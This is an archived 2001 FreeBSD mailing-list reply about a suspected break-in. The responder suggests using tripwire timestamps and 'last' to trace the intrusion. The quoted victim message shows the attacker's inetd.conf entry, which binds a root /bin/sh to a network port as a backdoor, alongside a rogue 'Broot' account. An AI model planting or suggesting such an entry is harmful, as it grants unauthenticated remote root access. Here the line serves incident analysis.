From owner-freebsd-questions Thu Oct 18 13:30:36 2001 Delivered-To: freebsd-questions@freebsd.org Received: from 4evermail.com (equinox.4evermail.com [204.92.209.4]) by hub.freebsd.org (Postfix) with SMTP id 3353637B408 for ; Thu, 18 Oct 2001 13:30:31 -0700 (PDT) Received: (qmail 71464 invoked from network); 18 Oct 2001 20:31:37 -0000 Received: from equinox.4evermail.com (HELO mail.4evermail.com) (nobody@204.92.209.4) by equinox.4evermail.com with SMTP; 18 Oct 2001 20:31:37 -0000 From: jslivko@4evermail.com To: Cc: freebsd-questions@freebsd.org, freebsd-security@freebsd.org Subject: Re: I got hacked, I think Date: Thu, 18 Oct 2001 16:31:37 +0000 X-Mailer: Null Webmail / 0.5.9 Message-Id: <20011018203031.3353637B408@hub.freebsd.org> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG [CC'd to -security, as this should be discussed there] Did you have any system snoopers around that you installed (tripwire and things of that ilk) that you can refer to for time information? If you can narrow down the time that the files were updated, you might have found out when the intrusion actually occurred and then, by grepping that information from "last", you can find out who he logged in as (assuming he logged in normally the first time). If I can be of any help, feel free to shoot me an e-mail. -- Jonathan --- "Tomek" wrote: > I found out more info. > > -rw-r--r-- 1 Broot wheel 54 Sep 26 10:24 /inetd.conf > -rw-r--r-- 1 Broot wheel 85857 Sep 26 21:38 /sudo- 1.6.3.7_1.tgz > -rw------- 1 Broot wheel 4869 Sep 26 10:25 /etc/inetd.conf > > Checking the bizarre /inetd.conf is shocking: > eklogin stream tcp nowait root /bin/sh sh -i > > I take it that "sh" would not even request a login or anything if called > directly from inetd.conf, would it? I am sitting here, he is STILL > pinging me and watching the system (even tried to ftp again a few > minutes ago), and for the life of me I can't figure out where it all > began... who did he even login in the first time, maybe it was some > buffer overflow or something.... yuck. > > TY for all your help guys, you are all wonderful! I will leave you in > peace now (I hope). I still dont know about Broot though... > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message